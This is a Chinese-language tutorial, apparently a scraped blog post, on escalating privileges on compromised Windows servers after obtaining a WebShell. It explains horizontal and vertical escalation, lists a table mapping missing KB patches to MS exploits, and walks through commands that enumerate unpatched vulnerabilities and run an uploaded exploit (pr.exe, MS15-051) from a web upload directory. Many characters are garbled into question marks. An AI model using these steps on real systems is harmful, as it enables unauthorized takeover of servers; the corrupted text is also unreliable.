服务器提权 _服务器提权

文章插图

当拿到WebShell 之后，下?步?什么？
权限提升
通过一些最初的漏洞利?途径，攻击者将获得?定的访问权限。接着，攻击者将逐步探
查其破坏的系统来获得?最初更多的权限，以期望从其他账户访问敏感信息，甚?获得
对整个系统的完全管理控制。当攻击者以这种?式扩?其最初的未经授权访问的权限
时，将其?为称为权限提升攻击。简单来说，就是获取?最初更多的权限，甚?系统权限。

?平权限提升（越权）
我们假设攻击者已经获得了在线银?账户的访问权限，他的?的是窃取?钱，但他从这?账户中窃
取的?钱并不多。这时，他就会寻找信息或者尝试各种漏洞利?途径来获得对其他账户的访问权
限。这称之为?平权限提升，因为攻击者是在具有相似权限的账户中横向移动。

垂直权限提升
通常攻击者的动机是完全控制计算机系统(管理员权限)，以便可以任意使?系统。当攻击者?先从
被攻击的?户账户开始并能够将其拥有的单??户扩?或提升完全管理权限或“根”权限时，我们称
这类攻击为垂直权限提升。

【服务器提权】windows 提权
针对于很多windows 系统，有时候会安装Web 套件（phpStudy），Web 套件的权限是?较?的。
操作系统漏洞提权
根据没有修补的补丁号码，直接提权即可。
补丁：kb
漏洞公告：MS
补丁与漏洞对照表

KB2360937 MS10-084KB2478960 MS11-014KB2507938 MS11-056KB2566454 MS11-062KB2646524 MS12-003KB2645640 MS12-009KB2641653 MS12-018KB944653 MS07-067KB952004 MS09-012 PRKB971657 MS09-041KB2620712 MS11-097KB2393802 MS11-011kb942831 MS08-005KB2503665 MS11-046KB2592799 MS11-080KB956572 MS09-012 巴?烤?KB2621440 MS12-020KB977165 MS10-015 Ms ViruKB4013081 MS17-017KB3139914 MS16-032KB3124280 MS16-016KB3134228 MS16-014KB3079904 MS15-097KB3077657 MS15-077KB3045171 MS15-051KB3000061 MS14-058KB2829361 MS13-046KB2850851 MS13-053 EPATHOBJ 0day 限32位KB2707511 MS12-042 sysret -pidKB2124261 KB2271195 MS10-065 IIS7KB3198234 MS16-135KB970483 MS09-020 IIS6KB3031432 MS15-015

Windows Server 2003：

文章插图

Window Server 2008访问：
password：black

文章插图

文章插图

未执行，权限过低！

文章插图

手动上传一个提权工具：

文章插图

systeminfo>C:WindowsTempa.txt&(for %i in (KB3057191 KB2840221 KB3000061KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @typeC:WindowsTempa.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /aC:WindowsTempa.txt

文章插图

根据补丁与漏洞对照表，可选择PR 提权。（具体提权原理涉及到Windows 系统底层知识，此处不再赘述，只需要使?提权EXP 即可）

文章插图

/c C:/Inetpub/ewebeditorv280/uploadfile/pr.exe "whoami"

文章插图

Windows Server 2008：
执?以下命令

systeminfo>C:WindowsTempa.txt&(for %i in (KB3124280 KB3143141 KB3134228KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851KB2707511 KB970483 KB2124261 KB2271195 KB3031432) do @typeC:WindowsTempa.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /aC:WindowsTempa.txt

根据补丁对照表，我们选择MS15-051 。
上传EXP （注意上传到可写?录）并提权！